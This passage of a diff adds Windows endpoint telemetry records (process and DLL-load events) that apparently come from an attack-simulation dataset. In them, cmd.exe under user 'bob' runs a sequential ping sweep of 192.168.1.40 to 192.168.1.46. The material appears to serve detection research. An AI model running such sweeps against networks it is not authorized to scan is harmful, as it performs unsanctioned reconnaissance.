"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177300000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "process", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572181990000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.40", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572182450016, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.41", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8060, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572182680000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182610000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182770000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182770000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "event_type": "process", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572186840000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.42", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572186990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "event_type": "process", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572191990000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.43", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2448, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572192130000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572192140000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "event_type": "process", + "pid": 2448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572196830000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.44", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572196980000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572196990000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "event_type": "process", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572197450016, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.45", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4996, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572197670000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197610000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572197770000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "event_type": "process", + "pid": 4996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572201830000, + "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.46", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7180, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572201980000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": 